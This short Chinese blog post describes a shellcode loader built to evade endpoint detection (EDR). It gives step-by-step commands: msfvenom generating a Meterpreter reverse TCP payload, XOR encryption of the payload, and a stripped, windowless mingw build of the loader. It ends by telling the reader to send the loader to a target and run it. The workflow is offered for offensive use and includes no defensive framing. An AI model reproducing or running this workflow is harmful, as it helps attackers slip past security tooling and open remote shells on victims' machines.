Shellcode-EDR-Evasion-Loader
Python Encrypter + C++ Loader
Shellcode 加载器
Python Encrypter + C++ Loader
特色
使用8字节旋转密钥的异或加密
外部有效载荷载荷(data.bin)
进程分离:生成独立的后台进程(无控制台窗口)
内存保护
用途
1- 生成shellcode(壳码)
测试有效载荷
msfvenom -p windows/x64/exec cmd=calc.exe -f raw -o payload.bin反壳
msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=_ LPORT=_ -f raw -o payload.bin2- 加密
python3 ShellLoaderEncrypter.py payload.bin输出:
data.bin:加密有效载荷
3- 编译加载器
x86_64-w64-mingw32-g++ ShellcodeLoader.cpp -o loader.exe -O2 -s -static -mwindows4- 执行
复制并发送到目标,然后运行:loader.exedata.bin
C:\> loader.exe
本文是原创文章,采用 CC BY-NC-ND 4.0 协议,完整转载请注明来自 程序员小航
评论
匿名评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果